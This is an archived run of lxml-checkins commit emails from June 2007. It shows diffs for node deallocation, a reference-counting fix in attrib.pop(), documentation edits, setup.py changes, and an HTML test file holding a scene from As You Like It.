canDeallocateChildNodes(self._c_doc) #tree.xmlFreeDoc(c_doc) - _deallocDocument(self._c_doc) + #_deallocDocument(self._c_doc) + _deallocDocument(self) cdef getroot(self): cdef xmlNode* c_node @@ -371,10 +375,17 @@ if node_ns_utf is not None: self._setNodeNs(c_node, _cstr(node_ns_utf)) +cdef extern from "etree_defs.h": + # macro call to 't->tp_new()' for fast instantiation + cdef _Document NEW_DOCUMENT "PY_NEW" (object t) + cdef _Document _documentFactory(xmlDoc* c_doc, _BaseParser parser): cdef _Document result - result = _Document() + result = NEW_DOCUMENT(_Document) result._c_doc = c_doc + result._disconnected_nodes = NULL + result._disconnected_nodes_max = 0 + result._disconnected_nodes_count = 0 result._ns_counter = 0 if parser is None: parser = __GLOBAL_PARSER_CONTEXT.getDefaultParser() @@ -437,7 +448,7 @@ #displayNode(self._c_node, 0) if self._c_node is not NULL: unregisterProxy(self) - attemptDeallocation(self._c_node) + #attemptDeallocation(self._c_node) # MANIPULATORS @@ -464,14 +475,14 @@ if c_node is NULL: raise IndexError, index _removeText(c_node.next) - _removeNode(c_node) + _removeNode(self._doc, c_node) def __delslice__(self, Py_ssize_t start, Py_ssize_t stop): """Deletes a number of subelements. """ cdef xmlNode* c_node c_node = _findChild(self._c_node, start) - _deleteSlice(c_node, start, stop) + _deleteSlice(self._doc, c_node, start, stop) def __setslice__(self, Py_ssize_t start, Py_ssize_t stop, value): """Replaces a number of subelements with elements @@ -487,7 +498,7 @@ c_node = _findChild(self._c_node, start) # now delete the slice if start != stop: - c_node = _deleteSlice(c_node, start, stop) + c_node = _deleteSlice(self._doc, c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: for element in value: @@ -599,7 +610,7 @@ if _isElement(c_node): _removeText(c_node_next) c_node_next = c_node.next - _removeNode(c_node) + _removeNode(self._doc, c_node) c_node = c_node_next def insert(self, index, _Element element not None): Modified: lxml/branch/proxy-dealloc/src/lxml/proxy.pxi ============================================================================== --- lxml/branch/proxy-dealloc/src/lxml/proxy.pxi (original) +++ lxml/branch/proxy-dealloc/src/lxml/proxy.pxi Tue Jun 26 15:00:01 2007 @@ -112,22 +112,120 @@ c_new_ns = c_new_ns.next c_parent = c_parent.parent + +################################################################################ +# list of xmlNodes that were taken out of a document + +cdef int _markNodeDisconnected(_Document doc, xmlNode* c_node) except -1: + cdef xmlNode** c_elements + cdef cstd.size_t i + if doc._disconnected_nodes is NULL: + doc._disconnected_nodes = \ + python.PyMem_Malloc(sizeof(xmlNode*) * 20) + doc._disconnected_nodes_max = 20 + doc._disconnected_nodes_count = 1 + doc._disconnected_nodes[0] = c_node + return 0 + + c_elements = doc._disconnected_nodes + for i from 0 <= i < doc._disconnected_nodes_count: + if c_elements[0] is c_node: + # already there + return 0 + c_elements = c_elements + 1 + + if doc._disconnected_nodes_count == doc._disconnected_nodes_max: + doc._disconnected_nodes_max = doc._disconnected_nodes_max * 2 + c_elements = python.PyMem_Realloc( + doc._disconnected_nodes, + sizeof(xmlNode*) * doc._disconnected_nodes_max) + if c_elements is NULL: + python.PyErr_NoMemory() + + doc._disconnected_nodes[doc._disconnected_nodes_count] = c_node + doc._disconnected_nodes_count = doc._disconnected_nodes_count + 1 + return 0 + +cdef void _markNodeNotDisconnected(_Document doc, xmlNode* c_node): + cdef xmlNode** c_elements + cdef xmlNode** c_end + if doc._disconnected_nodes_count == 0: + return + + c_elements = doc._disconnected_nodes + c_end = c_elements + doc._disconnected_nodes_count + while c_elements[0] is not c_node: + c_elements = c_elements + 1 + if c_elements is c_end: + # not found + return + + doc._disconnected_nodes_count = doc._disconnected_nodes_count - 1 + while c_elements is not c_end: + c_elements[0] = c_elements[1] + c_elements = c_elements + 1 + +cdef int _deallocDocument(_Document doc) except -1: + """We cannot rely on Python's GC to *always* dealloc the _Document *after* + all proxies it contains => run through all elements that were removed from + the tree structure and free their top nodes. Then, free the document + itself, i.e. the connected tree. + """ + cdef xmlNode* c_node + cdef xmlNode* c_root_node + cdef xmlNode** c_elements + cdef xmlNode** c_roots + cdef xmlNode** c_node_pos + cdef cstd.size_t i,t + # find real tree roots and make sure we only have those once + c_elements = doc._disconnected_nodes + for i from 0 <= i < doc._disconnected_nodes_count: + c_node = c_elements[i] + while c_node.parent is not NULL: + c_node = c_node.parent + if c_node is doc._c_doc: + c_elements[i] = NULL + else: + assert _isElement(c_node) + for t from 0 <= t < i: + if c_elements[t] is c_node: + c_elements[i] = NULL + break + else: + c_root_node = c_node + tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_root_node, c_node, 1) + if c_node._private is not NULL: + (<_Element>c_node._private)._c_node = NULL + tree.END_FOR_EACH_ELEMENT_FROM(c_node) + c_elements[i] = c_root_node + tree.xmlFreeNode(c_root_node) + + # then, free the connected part of the document + tree.xmlFreeDoc(doc._c_doc) + + if doc._disconnected_nodes is not NULL: + python.PyMem_Free(doc._disconnected_nodes) + doc._disconnected_nodes = NULL + doc._disconnected_nodes_count = 0 + ################################################################################ # support for freeing tree elements when proxy objects are destroyed -cdef void attemptDeallocation(xmlNode* c_node): +cdef int attemptDeallocation(xmlNode* c_node): """Attempt deallocation of c_node (or higher up in tree). """ cdef xmlNode* c_top # could be we actually aren't referring to the tree at all if c_node is NULL: #print "not freeing, node is NULL" - return + return 0 c_top = getDeallocationTop(c_node) if c_top is not NULL: #print "freeing:", c_top.name _removeText(c_top.next) # tail tree.xmlFreeNode(c_top) + return 1 + return 0 cdef xmlNode* getDeallocationTop(xmlNode* c_node): """Return the top of the tree that can be deallocated, or NULL. @@ -167,7 +265,7 @@ tree.END_FOR_EACH_ELEMENT_FROM(c_node) return 1 -cdef void _deallocDocument(xmlDoc* c_doc): +cdef void XXX_deallocDocument(xmlDoc* c_doc): """We cannot rely on Python's GC to *always* dealloc the _Document *after* all proxies it contains => traverse the document and mark all its proxies as dead by deleting their xmlNode* reference. @@ -200,6 +298,7 @@ cdef xmlNs* c_del_ns cdef xmlNs* c_last_del_ns cdef cstd.size_t i, c_cache_size, c_cache_last + cdef _Element current_element c_element = node._c_node c_doc = c_element.doc @@ -207,6 +306,8 @@ if not tree._isElementOrXInclude(c_element): return + _markNodeNotDisconnected(node._doc, c_element) + c_start_node = c_element c_ns_new_cache = NULL c_ns_old_cache = NULL @@ -300,7 +401,9 @@ # fix _Document reference (may dealloc the original document!) if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + current_element = <_Element>c_element._private + _markNodeNotDisconnected(current_element._doc, c_element) + current_element._doc = doc if c_element is c_start_node: break @@ -318,7 +421,9 @@ # fix _Document reference (may dealloc the original document!) if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + current_element = <_Element>c_element._private + _markNodeNotDisconnected(current_element._doc, c_element) + current_element._doc = doc if c_element is c_start_node: break From lxml-checkins at codespeak.net Tue Jun 26 18:51:28 2007 From: lxml-checkins at codespeak.net (lxml-checkins at codespeak.net) Date: Tue, 26 Jun 2007 18:51:28 +0200 (CEST) Subject: [Lxml-checkins] Additional savings on clearance - up to 80% off! Message-ID: <20070626055439.10696.qmail@og8882-1.nwol.net> An HTML attachment was scrubbed... URL: http://codespeak.net/pipermail/lxml-checkins/attachments/20070626/d6bae706/attachment.htm From ianb at codespeak.net Tue Jun 26 23:08:05 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Tue, 26 Jun 2007 23:08:05 +0200 (CEST) Subject: [Lxml-checkins] r44553 - lxml/branch/html/src/lxml/html/tests Message-ID: <20070626210805.27D3E80FC@code0.codespeak.net> Author: ianb Date: Tue Jun 26 23:08:03 2007 New Revision: 44553 Modified: lxml/branch/html/src/lxml/html/tests/test_autolink.txt Log: added some (already passing) tests for linking Modified: lxml/branch/html/src/lxml/html/tests/test_autolink.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_autolink.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_autolink.txt Tue Jun 26 23:08:03 2007 @@ -16,6 +16,12 @@ ... the http://foobar.com links.''')
The great thing is the http://link.com links and the http://foobar.com links.
+ >>> print autolink_html(''' + ...
Link: <http://foobar.com>
''') + + >>> print autolink_html(''' + ...
Link: (http://foobar.com)
''') + Some cases that won't be caught (on purpose):: From ianb at codespeak.net Wed Jun 27 00:59:13 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Wed, 27 Jun 2007 00:59:13 +0200 (CEST) Subject: [Lxml-checkins] r44555 - lxml/branch/html/src/lxml/html Message-ID: <20070626225913.BF5DC80FA@code0.codespeak.net> Author: ianb Date: Wed Jun 27 00:59:12 2007 New Revision: 44555 Modified: lxml/branch/html/src/lxml/html/formfill.py Log: put all public objects in __all__ Modified: lxml/branch/html/src/lxml/html/formfill.py ============================================================================== --- lxml/branch/html/src/lxml/html/formfill.py (original) +++ lxml/branch/html/src/lxml/html/formfill.py Wed Jun 27 00:59:12 2007 @@ -2,7 +2,9 @@ from lxml.html import parse, tostring from lxml.html import defs -__all__ = ['FormNotFound', 'fill_form'] +__all__ = ['FormNotFound', 'fill_form', 'fill_form_html', + 'insert_errors', 'insert_errors_html', + 'DefaultErrorCreator'] class FormNotFound(LookupError): """ From scoder at codespeak.net Wed Jun 27 22:54:40 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 27 Jun 2007 22:54:40 +0200 (CEST) Subject: [Lxml-checkins] r44567 - in lxml/trunk: . src/lxml Message-ID: <20070627205440.29ED08110@code0.codespeak.net> Author: scoder Date: Wed Jun 27 22:54:38 2007 New Revision: 44567 Modified: lxml/trunk/CHANGES.txt lxml/trunk/src/lxml/etree.pyx Log: refcounting bug in attrib.pop() Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Wed Jun 27 22:54:38 2007 @@ -30,6 +30,8 @@ Bugs fixed ---------- +* Reference-counting bug in ``Element.attrib.pop()`` + * The XML parser did not report undefined entities as error * The text in exceptions raised by XML parsers, validators and XPath Modified: lxml/trunk/src/lxml/etree.pyx ============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Wed Jun 27 22:54:38 2007 @@ -1498,10 +1498,11 @@ if python.PyTuple_GET_SIZE(default) == 0: raise KeyError, key else: - return python.PyTuple_GET_ITEM(default, 0) + result = python.PyTuple_GET_ITEM(default, 0) + python.Py_INCREF(result) else: _delAttribute(self._element, key) - return result + return result def clear(self): cdef xmlNode* c_node From scoder at codespeak.net Wed Jun 27 22:55:57 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 27 Jun 2007 22:55:57 +0200 (CEST) Subject: [Lxml-checkins] r44568 - in lxml/branch/lxml-1.3: . src/lxml Message-ID: <20070627205557.078C2810A@code0.codespeak.net> Author: scoder Date: Wed Jun 27 22:55:57 2007 New Revision: 44568 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: refcounting bug in attrib.pop() Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Wed Jun 27 22:55:57 2007 @@ -2,6 +2,18 @@ lxml changelog ============== +Under development +================= + +Features added +-------------- + +Bugs fixed +---------- + +* Reference-counting bug in ``Element.attrib.pop()`` + + 1.3 (2007-06-24) ================ Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Wed Jun 27 22:55:57 2007 @@ -1480,10 +1480,11 @@ if python.PyTuple_GET_SIZE(default) == 0: raise KeyError, key else: - return python.PyTuple_GET_ITEM(default, 0) + result = python.PyTuple_GET_ITEM(default, 0) + python.Py_INCREF(result) else: _delAttribute(self._element, key) - return result + return result def clear(self): cdef xmlNode* c_node From scoder at codespeak.net Wed Jun 27 22:56:21 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 27 Jun 2007 22:56:21 +0200 (CEST) Subject: [Lxml-checkins] r44569 - lxml/trunk/doc Message-ID: <20070627205621.7A266810A@code0.codespeak.net> Author: scoder Date: Wed Jun 27 22:56:21 2007 New Revision: 44569 Modified: lxml/trunk/doc/objectify.txt Log: small extension to doctest Modified: lxml/trunk/doc/objectify.txt ============================================================================== --- lxml/trunk/doc/objectify.txt (original) +++ lxml/trunk/doc/objectify.txt Wed Jun 27 22:56:21 2007 @@ -277,7 +277,7 @@ ... E.a(5), ... E.b(6.1), ... E.c(True), - ... E.d("how") + ... E.d("how", tell="me") ... ) >>> print etree.tostring(root, pretty_print=True) @@ -285,11 +285,10 @@ 5 6.1 true - how + how - Namespace handling ------------------ From scoder at codespeak.net Thu Jun 28 15:04:46 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 28 Jun 2007 15:04:46 +0200 (CEST) Subject: [Lxml-checkins] r44596 - lxml/trunk/doc Message-ID: <20070628130446.598818101@code0.codespeak.net> Author: scoder Date: Thu Jun 28 15:04:45 2007 New Revision: 44596 Modified: lxml/trunk/doc/performance.txt Log: clarification in performance.txt Modified: lxml/trunk/doc/performance.txt ============================================================================== --- lxml/trunk/doc/performance.txt (original) +++ lxml/trunk/doc/performance.txt Thu Jun 28 15:04:45 2007 @@ -466,8 +466,11 @@ Since then, lxml has matured a lot and has gotten much faster. The iterparse variant now runs in 0.14 seconds, and if you remove the ``v.clear()``, it is -even a little faster (which isn't the case for cElementTree). When you move -the whole thing to a pure XPath implementation, it will look like this:: +even a little faster (which isn't the case for cElementTree). + +One of the many great tools in lxml is XPath, a swiss army knife for finding +things in XML documents. It is possible to move the whole thing to a pure +XPath implementation, which looks like this:: def bench_lxml_xpath_all(): tree = etree.parse("ot.xml") @@ -523,6 +526,11 @@ started with ``getiterator("v")`` or ``iterparse()``. Either of them would already have been the most efficient, depending on which library is used. +* It's important to know your tool. lxml and cElementTree are both very fast + libraries, but they do not have the same performance characteristics. The + fastest solution in one library can be comparatively slow in the other. If + you optimise, optimise for the specific target platform. + * It's not always worth optimising. After all that hassle we got from 0.12 seconds for the initial implementation to 0.11 seconds. Switching over to cElementTree and writing an ``iterparse()`` based version would have given From scoder at codespeak.net Thu Jun 28 15:05:12 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 28 Jun 2007 15:05:12 +0200 (CEST) Subject: [Lxml-checkins] r44597 - lxml/branch/lxml-1.3/doc Message-ID: <20070628130512.51B528101@code0.codespeak.net> Author: scoder Date: Thu Jun 28 15:05:12 2007 New Revision: 44597 Modified: lxml/branch/lxml-1.3/doc/performance.txt Log: doc update from trunk Modified: lxml/branch/lxml-1.3/doc/performance.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/performance.txt (original) +++ lxml/branch/lxml-1.3/doc/performance.txt Thu Jun 28 15:05:12 2007 @@ -474,8 +474,11 @@ Since then, lxml has matured a lot and has gotten much faster. The iterparse variant now runs in 0.14 seconds, and if you remove the ``v.clear()``, it is -even a little faster (which isn't the case for cElementTree). When you move -the whole thing to a pure XPath implementation, it will look like this:: +even a little faster (which isn't the case for cElementTree). + +One of the many great tools in lxml is XPath, a swiss army knife for finding +things in XML documents. It is possible to move the whole thing to a pure +XPath implementation, which looks like this:: def bench_lxml_xpath_all(): tree = etree.parse("ot.xml") @@ -531,6 +534,11 @@ started with ``getiterator("v")`` or ``iterparse()``. Either of them would already have been the most efficient, depending on which library is used. +* It's important to know your tool. lxml and cElementTree are both very fast + libraries, but they do not have the same performance characteristics. The + fastest solution in one library can be comparatively slow in the other. If + you optimise, optimise for the specific target platform. + * It's not always worth optimising. After all that hassle we got from 0.12 seconds for the initial implementation to 0.11 seconds. Switching over to cElementTree and writing an ``iterparse()`` based version would have given From scoder at codespeak.net Fri Jun 29 10:28:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 10:28:24 +0200 (CEST) Subject: [Lxml-checkins] r44612 - lxml/trunk Message-ID: <20070629082824.C2C7480A9@code0.codespeak.net> Author: scoder Date: Fri Jun 29 10:28:23 2007 New Revision: 44612 Modified: lxml/trunk/setup.py lxml/trunk/setupinfo.py Log: build with distutils if setuptools are not installed Modified: lxml/trunk/setup.py ============================================================================== --- lxml/trunk/setup.py (original) +++ lxml/trunk/setup.py Fri Jun 29 10:28:23 2007 @@ -1,12 +1,21 @@ -from ez_setup import use_setuptools -use_setuptools(version="0.6c5") - -from setuptools import setup import sys, os -# need to insert this to python path so we're sure we can import -# versioninfo and setupinfo even if we start setup.py from another -# location (such as a buildout) +try: + try: + import pkg_resources + pkg_resources.require("setuptools>=0.6c5") + except pkg_resources.VersionConflict, e: + from ez_setup import use_setuptools + use_setuptools(version="0.6c5") + raise ImportError + from setuptools import setup +except ImportError: + # not setuptools installed + from distutils.core import setup + +# need to insert this to python path so we're sure we can import versioninfo, +# setupinfo and Pyrex (!) even if we start setup.py from another location +# (such as a buildout) sys.path.insert(0, os.path.dirname(__file__)) import versioninfo Modified: lxml/trunk/setupinfo.py ============================================================================== --- lxml/trunk/setupinfo.py (original) +++ lxml/trunk/setupinfo.py Fri Jun 29 10:28:23 2007 @@ -1,5 +1,8 @@ import sys, os -from setuptools.extension import Extension +try: + from setuptools.extension import Extension +except ImportError: + from distutils.extension import Extension try: from Pyrex.Distutils import build_ext as build_pyx From scoder at codespeak.net Fri Jun 29 10:28:46 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 10:28:46 +0200 (CEST) Subject: [Lxml-checkins] r44613 - lxml/branch/lxml-1.3 Message-ID: <20070629082846.40CD380A9@code0.codespeak.net> Author: scoder Date: Fri Jun 29 10:28:45 2007 New Revision: 44613 Modified: lxml/branch/lxml-1.3/setup.py lxml/branch/lxml-1.3/setupinfo.py Log: build with distutils if setuptools are not installed Modified: lxml/branch/lxml-1.3/setup.py ============================================================================== --- lxml/branch/lxml-1.3/setup.py (original) +++ lxml/branch/lxml-1.3/setup.py Fri Jun 29 10:28:45 2007 @@ -1,12 +1,21 @@ -from ez_setup import use_setuptools -use_setuptools(version="0.6c5") - -from setuptools import setup import sys, os -# need to insert this to python path so we're sure we can import -# versioninfo and setupinfo even if we start setup.py from another -# location (such as a buildout) +try: + try: + import pkg_resources + pkg_resources.require("setuptools>=0.6c5") + except pkg_resources.VersionConflict, e: + from ez_setup import use_setuptools + use_setuptools(version="0.6c5") + raise ImportError + from setuptools import setup +except ImportError: + # not setuptools installed + from distutils.core import setup + +# need to insert this to python path so we're sure we can import versioninfo, +# setupinfo and Pyrex (!) even if we start setup.py from another location +# (such as a buildout) sys.path.insert(0, os.path.dirname(__file__)) import versioninfo Modified: lxml/branch/lxml-1.3/setupinfo.py ============================================================================== --- lxml/branch/lxml-1.3/setupinfo.py (original) +++ lxml/branch/lxml-1.3/setupinfo.py Fri Jun 29 10:28:45 2007 @@ -1,5 +1,8 @@ import sys, os -from setuptools.extension import Extension +try: + from setuptools.extension import Extension +except ImportError: + from distutils.extension import Extension try: from Pyrex.Distutils import build_ext as build_pyx From scoder at codespeak.net Fri Jun 29 10:30:09 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 10:30:09 +0200 (CEST) Subject: [Lxml-checkins] r44614 - lxml/trunk/src/lxml Message-ID: <20070629083009.7836380A9@code0.codespeak.net> Author: scoder Date: Fri Jun 29 10:30:09 2007 New Revision: 44614 Modified: lxml/trunk/src/lxml/etree.pyx Log: cleanup Modified: lxml/trunk/src/lxml/etree.pyx ============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Fri Jun 29 10:30:09 2007 @@ -501,7 +501,6 @@ # store possible text tail c_next = element._c_node.next # now move node previous to insertion point - tree.xmlUnlinkNode(element._c_node) tree.xmlAddPrevSibling(c_node, element._c_node) # and move tail just behind his node _moveTail(c_next, element._c_node) @@ -630,6 +629,7 @@ c_next = element._c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) + # fix namespace declarations moveNodeToDocument(self._doc, c_node) def replace(self, _Element old_element not None, @@ -650,6 +650,8 @@ _moveTail(c_new_next, c_new_node) _moveTail(c_old_next, c_old_node) moveNodeToDocument(self._doc, c_new_node) + # fix namespace declarations + moveNodeToDocument(self._doc, c_old_node) # PROPERTIES property tag: From scoder at codespeak.net Fri Jun 29 10:30:30 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 10:30:30 +0200 (CEST) Subject: [Lxml-checkins] r44615 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070629083030.03CDD80A9@code0.codespeak.net> Author: scoder Date: Fri Jun 29 10:30:30 2007 New Revision: 44615 Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: merged in small cleanup from trunk Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Fri Jun 29 10:30:30 2007 @@ -501,7 +501,6 @@ # store possible text tail c_next = element._c_node.next # now move node previous to insertion point - tree.xmlUnlinkNode(element._c_node) tree.xmlAddPrevSibling(c_node, element._c_node) # and move tail just behind his node _moveTail(c_next, element._c_node) @@ -630,6 +629,7 @@ c_next = element._c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) + # fix namespace declarations moveNodeToDocument(self._doc, c_node) def replace(self, _Element old_element not None, @@ -650,6 +650,8 @@ _moveTail(c_new_next, c_new_node) _moveTail(c_old_next, c_old_node) moveNodeToDocument(self._doc, c_new_node) + # fix namespace declarations + moveNodeToDocument(self._doc, c_old_node) # PROPERTIES property tag: From scoder at codespeak.net Fri Jun 29 10:51:30 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 10:51:30 +0200 (CEST) Subject: [Lxml-checkins] r44616 - lxml/branch/html/src/lxml/html Message-ID: <20070629085130.7753380EC@code0.codespeak.net> Author: scoder Date: Fri Jun 29 10:51:28 2007 New Revision: 44616 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: use getiterator() where appropriate Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 29 10:51:28 2007 @@ -151,7 +151,7 @@ link you get is exactly the link in the document. """ link_attrs = defs.link_attrs - for el in _itertree(self): + for el in self.getiterator(): for attrib in link_attrs: if attrib in el.attrib: yield (el, attrib, el.attrib[attrib], 0) @@ -404,7 +404,7 @@ def _contains_block_level_tag(el): # FIXME: I could do this with XPath, but would that just be # unnecessarily slow? - for el in _itertree(el): + for el in el.getiterator(): if el.tag in defs.block_tags: return True return False @@ -417,16 +417,6 @@ else: return el.tag -# FIXME: should this be a method? It's convenient, but I can't find a -# method that does something like it. -def _itertree(el): - """ - Return the element's descendants, and the element itself - """ - yield el - for item in el.iterdescendants(): - yield item - def Element(*args, **kw): v = html_parser.makeelement(*args, **kw) return v From scoder at codespeak.net Fri Jun 29 18:49:37 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 18:49:37 +0200 (CEST) Subject: [Lxml-checkins] r44620 - lxml/trunk/src/lxml Message-ID: <20070629164937.8A7D38118@code0.codespeak.net> Author: scoder Date: Fri Jun 29 18:49:36 2007 New Revision: 44620 Modified: lxml/trunk/src/lxml/iterparse.pxi Log: small cleanup Modified: lxml/trunk/src/lxml/iterparse.pxi ============================================================================== --- lxml/trunk/src/lxml/iterparse.pxi (original) +++ lxml/trunk/src/lxml/iterparse.pxi Fri Jun 29 18:49:36 2007 @@ -3,7 +3,7 @@ cdef object __ITERPARSE_CHUNK_SIZE __ITERPARSE_CHUNK_SIZE = 32768 -ctypedef enum IterparseEventFilter: +ctypedef enum _IterparseEventFilter: ITERPARSE_FILTER_START = 1 ITERPARSE_FILTER_END = 2 ITERPARSE_FILTER_START_NS = 4 From ianb at codespeak.net Fri Jun 29 18:51:58 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 29 Jun 2007 18:51:58 +0200 (CEST) Subject: [Lxml-checkins] r44621 - lxml/branch/html/src/lxml/html/tests Message-ID: <20070629165158.43BB68118@code0.codespeak.net> Author: ianb Date: Fri Jun 29 18:51:58 2007 New Revision: 44621 Added: lxml/branch/html/src/lxml/html/tests/css_shakespear.html (contents, props changed) lxml/branch/html/src/lxml/html/tests/test_css.py (contents, props changed) lxml/branch/html/src/lxml/html/tests/test_css.txt (contents, props changed) Log: Added incomplete CSS selector code Added: lxml/branch/html/src/lxml/html/tests/css_shakespear.html ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/css_shakespear.html Fri Jun 29 18:51:58 2007 @@ -0,0 +1,526 @@ + + + + + + + + + +
+
+

As You Like It

+
+ + by William Shakespeare + + +
+
+ +

ACT I, SCENE III. A room in the palace.

+ +
+
Enter CELIA and ROSALIND
+ +
+ +
CELIA
+ +
+
Why, cousin! why, Rosalind! Cupid have mercy! not a word?
+ +
+ +
ROSALIND
+ +
+
Not one to throw at a dog.
+ +
+ +
CELIA
+ +
+
No, thy words are too precious to be cast away upon
+ +
curs; throw some of them at me; come, lame me with reasons.
+ +
+ +
ROSALIND
+ +
CELIA
+ +
+
But is all this for your father?
+ +
+ +
+
Then there were two cousins laid up; when the one
+
should be lamed with reasons and the other mad
+ +
without any.
+
+ +
ROSALIND
+ +
+
No, some of it is for my child's father. O, how
+ +
full of briers is this working-day world!
+ +
+ +
CELIA
+ +
+ +
They are but burs, cousin, thrown upon thee in
+
holiday foolery: if we walk not in the trodden
+ +
paths our very petticoats will catch them.
+ +
+ +
ROSALIND
+ +
+
I could shake them off my coat: these burs are in my heart.
+
+ +
CELIA
+ +
+
Hem them away.
+ +
+ +
ROSALIND
+ +
+ +
I would try, if I could cry 'hem' and have him.
+
+ +
CELIA
+ +
+
Come, come, wrestle with thy affections.
+ +
+ +
ROSALIND
+
+
O, they take the part of a better wrestler than myself!
+ +
+ +
CELIA
+ +
+ +
O, a good wish upon you! you will try in time, in
+
despite of a fall. But, turning these jests out of
+
service, let us talk in good earnest: is it
+ +
possible, on such a sudden, you should fall into so
+ +
strong a liking with old Sir Rowland's youngest son?
+ +
+ +
ROSALIND
+
+
The duke my father loved his father dearly.
+ +
+ +
CELIA
+ +
+ +
Doth it therefore ensue that you should love his son
+ +
dearly? By this kind of chase, I should hate him,
+ +
for my father hated his father dearly; yet I hate
+ +
not Orlando.
+ +
+ +
ROSALIND
+ +
+ +
No, faith, hate him not, for my sake.
+ +
+ +
CELIA
+ +
+
Why should I not? doth he not deserve well?
+ +
+ +
ROSALIND
+ +
+
Let me love him for that, and do you love him
+
because I do. Look, here comes the duke.
+
+ +
CELIA
+ +
+ +
With his eyes full of anger.
+
Enter DUKE FREDERICK, with Lords
+
+ +
DUKE FREDERICK
+ +
+ +
Mistress, dispatch you with your safest haste
+ +
And get you from our court.
+
+ +
ROSALIND
+ +
+ +
Me, uncle?
+ +
+ +
DUKE FREDERICK
+
+
You, cousin
+ +
Within these ten days if that thou be'st found
+ +
So near our public court as twenty miles,
+ +
Thou diest for it.
+ +
+ +
ROSALIND
+ +
+ +
I do beseech your grace,
+ +
Let me the knowledge of my fault bear with me:
+
If with myself I hold intelligence
+ +
Or have acquaintance with mine own desires,
+ +
If that I do not dream or be not frantic,--
+ +
As I do trust I am not--then, dear uncle,
+ +
Never so much as in a thought unborn
+ +
Did I offend your highness.
+ +
+ +
DUKE FREDERICK
+ +
+
Thus do all traitors:
+ +
If their purgation did consist in words,
+ +
They are as innocent as grace itself:
+ +
Let it suffice thee that I trust thee not.
+ +
+ +
ROSALIND
+ +
+ +
Yet your mistrust cannot make me a traitor:
+ +
Tell me whereon the likelihood depends.
+ +
+ +
DUKE FREDERICK
+
+ +
Thou art thy father's daughter; there's enough.
+ +
+ +
ROSALIND
+ +
+
So was I when your highness took his dukedom;
+
So was I when your highness banish'd him:
+ +
Treason is not inherited, my lord;
+ +
Or, if we did derive it from our friends,
+ +
What's that to me? my father was no traitor:
+ +
Then, good my liege, mistake me not so much
+
To think my poverty is treacherous.
+ +
+ +
CELIA
+
+ +
Dear sovereign, hear me speak.
+ +
+ +
DUKE FREDERICK
+ +
+
Ay, Celia; we stay'd her for your sake,
+
Else had she with her father ranged along.
+ +
+ +
CELIA
+ +
+ +
I did not then entreat to have her stay;
+
It was your pleasure and your own remorse:
+
I was too young that time to value her;
+ +
But now I know her: if she be a traitor,
+ +
Why so am I; we still have slept together,
+ +
Rose at an instant, learn'd, play'd, eat together,
+
And wheresoever we went, like Juno's swans,
+ +
Still we went coupled and inseparable.
+
+ +
DUKE FREDERICK
+ +
+
She is too subtle for thee; and her smoothness,
+
Her very silence and her patience
+
Speak to the people, and they pity her.
+
Thou art a fool: she robs thee of thy name;
+ +
And thou wilt show more bright and seem more virtuous
+ +
When she is gone. Then open not thy lips:
+
Firm and irrevocable is my doom
+
Which I have pass'd upon her; she is banish'd.
+
+ +
CELIA
+ +
+
Pronounce that sentence then on me, my liege:
+
I cannot live out of her company.
+
+ +
DUKE FREDERICK
+ +
+
You are a fool. You, niece, provide yourself:
+ +
If you outstay the time, upon mine honour,
+
And in the greatness of my word, you die.
+
Exeunt DUKE FREDERICK and Lords
+
+ +
CELIA
+
+ +
O my poor Rosalind, whither wilt thou go?
+ +
Wilt thou change fathers? I will give thee mine.
+
I charge thee, be not thou more grieved than I am.
+ +
+ +
ROSALIND
+ +
+ +
I have more cause.
+
+ +
CELIA
+ +
+
Thou hast not, cousin;
+ +
